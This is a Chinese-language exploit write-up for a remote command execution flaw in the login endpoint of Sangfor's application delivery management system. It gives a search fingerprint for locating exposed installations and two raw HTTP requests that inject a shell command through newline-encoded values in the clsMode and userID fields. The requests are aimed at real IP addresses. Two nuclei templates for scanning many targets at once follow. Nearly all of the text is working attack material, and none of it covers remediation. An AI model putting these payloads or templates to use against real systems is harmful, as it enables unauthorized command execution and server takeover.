漏洞描述

深信服 应⽤交付管理系统 login 存在远程命令执⾏漏洞，攻击者通过漏洞可以获取服务器权
限，执⾏任意命令

漏洞影响

深信服 应⽤交付管理系统 7.0.8-7.0.8R5

⽹络测绘

fid="iaytNA57019/kADk8Nev7g=="
登录页面如下：

第一个POC

输入账号密码拦截登录请求包，然后更改数据包。

POST /rep/login HTTP/1.1
Host: 183.36.70.149:85
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close

clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&logi
nType=account&page=login&rnd=0&userID=admin&userPsw=123

第二个POC

POST /rep/login HTTP/1.1
Host: 111.22.158.82:85
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Connection: close
Content-Length: 122

clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid%0A&userPsw=tmbhuisq

nuclei批量yaml脚本

id: sangfor_baobiao_RCE_1
info:
  name: 深信服 应用交付管理系统 login 远程命令执行漏洞
  author: mhb17
  severity: critical
  description: 深信服 应用交付管理系统 login 远程命令执行漏洞
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
  tags: rce
requests:
  - raw:
      - |-
        POST /rep/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        Content-Length: 122

        clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e8be93e5
      - type: word
        part: header
        words:
          - '200'

id: sangfor_baobiao_RCE_2
info:
  name: 深信服 应用交付管理系统 login 远程命令执行漏洞
  author: mhb17
  severity: critical
  description: 深信服 应用交付管理系统 login 远程命令执行漏洞
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
  tags: rce
requests:
  - raw:
      - |-
        POST /rep/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        Content-Length: 122

        clsMode=cls_mode_login&index=index&log_type=report&page=login&rnd=0.7550103466497915&userID=admin%0Aid%0A&userPsw=tmbhuisq
    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - e8be93e5
      - type: word
        part: header
        words:
          - '200'